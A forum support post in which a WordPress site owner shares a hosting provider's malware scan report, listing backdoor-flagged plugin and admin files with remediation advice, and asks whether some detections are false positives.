Reply To: Pharma Hack

Home Forums Support Forum Pharma Hack Reply To: Pharma Hack

Bill Hand
Bill Hand


My domain host did a scan of my site last night and sent me this email. I ended up purchasing Sitelock so they would not shut down my site. This is just a partial list of the files they say were infected:

“A scan of your account has found the following malicious or infected files present 

wp-content/plugins/revslider/general.php: JCDEF.Obfus.CreateFunc.BackDoorEval-24.UNOFFICIAL FOUND wp-content/plugins/revslider/temp/index_backup.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND wp-content/plugins/contact-form-7/general.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND wp-content/plugins/cats-jobsite/meta.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND wp-content/plugins/bwp-google-xml-sitemaps/load.php: JCDEF.Obfus.CreateFunc.BackDoorEval-25.UNOFFICIAL FOUND wp-content/plugins/w3-total-cache/lib/Microsoft/Http/Response/Stream_indesit.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND wp-content/plugins/w3-total-cache/lib/W3/Cdn/Base_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND wp-content/plugins/w3-total-cache/inc/options/support/select_ver1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND wp-content/plugins/w3-total-cache/ini/s3-sample-policy_backup.php: JCDEF.Obfus.CreateFunc.BackDoorEval-18.UNOFFICIAL FOUND wp-content/plugins/wordpress-seo/meta.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND wp-content/plugins/underconstruction/meta.php: JCDEF.Obfus.CreateFunc.BackDoorEval-25.UNOFFICIAL FOUND wp-content/plugins/quick-pagepost-redirect-plugin/locale.php: JCDEF.Obfus.CreateFunc.BackDoorEval-24.UNOFFICIAL FOUND 


/home/users/web/b741/ipg.fullergrpcom/2014/wp-content/uploads/quarantine/F25NS.F25NS.L2hlcm1lcy9ib3NvcmF3ZWIxNTUvYjc0MS9pcGcuZnVsbGVyZ3JwY29tLzIwMTQvd3AtY29udGVudC90aGVtZXMvYXR0aXR1ZGUtcHJvLTEuN25ldy9mdW5jdGlvbnMucGhw1.GOTMLS: SiteLock-PHP-INJECTOR-1-et.UNOFFICIAL FOUND /home/users/web/b741/ipg.fullergrpcom/2014/wp-content/uploads/quarantine/F15Ji.F15Ji.L2hlcm1lcy9ib3NvcmF3ZWIxNTUvYjc0MS9pcGcuZnVsbGVyZ3JwY29tLzIwMTQvd3AtY29udGVudC90aGVtZXMvYXR0aXR1ZGUtcHJvLW9sZDIwMTQvZnVuY3Rpb25zLnBocA3.GOTMLS: SiteLock-PHP-INJECTOR-1-et.UNOFFICIAL FOUND wp-admin/media-upload_noversion.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND wp-admin/admin-media.php: JCDEF.Obfus.CreateFunc.BackDoorEval-26.UNOFFICIAL FOUND wp-admin/js/gallery_bck_old.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND wp-admin/includes/template_prevv1.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND wp-admin/includes/class-wp-locale.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND wp-admin/css/color-picker-rtl_backup.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND wp-admin/user/user-edit_new.php: JCDEF.Obfus.CreateFunc.BackDoorEval-23.UNOFFICIAL FOUND 


Due to the potential for abuse in this malware, and to protect your site content from further damage, we will have to suspend website services for your account, if this is not addressed within 24 hours. Please remove/replace the malicious files as appropriate, through FTP or the file manager. I would recommend deleting and republishing your entire site from a clean copy; this should then erase any other code which may have been injected into your pages to allow ‘back-door’ access by unauthorized people. Most importantly, you need to make sure any applications in your account are completely up-to-date as far as versions, security patches, etc. are concerned. This applies not just to the core application, but also plugins, themes, modules, etc. ** If this is not done, your account will remain vulnerable to future attacks of this kind. ** In addition, you should immediately change your password through the control panel for the account. You should choose a ‘strong’ password, which includes upper- and lower-case letters, numbers and special characters such as hyphens, and is at least eight characters long. This will help reduce the chance of this happening again. Other possible causes include - a computer infected by viruses, which is controlled by hackers. In this situation, your uploads may also get infected. - poor scripts and/or applications, which allow hackers to insert various malformed queries to remotely execute code - Virus effected theme selection for applications - Installing applications, add-ons or modules which are downloaded form third-party locations and may be infected. Please let us know when you have addressed the malicious files.”

I can see where your plugin quarantined the two files listed as PHP Injector. I was wondering whether the rest of the files were false positives or if they were really infected? I assume Sitelock has cleaned these files now.

If you can show me how to attach a file I can send the one you requested. Hopefully the issue has been resolved.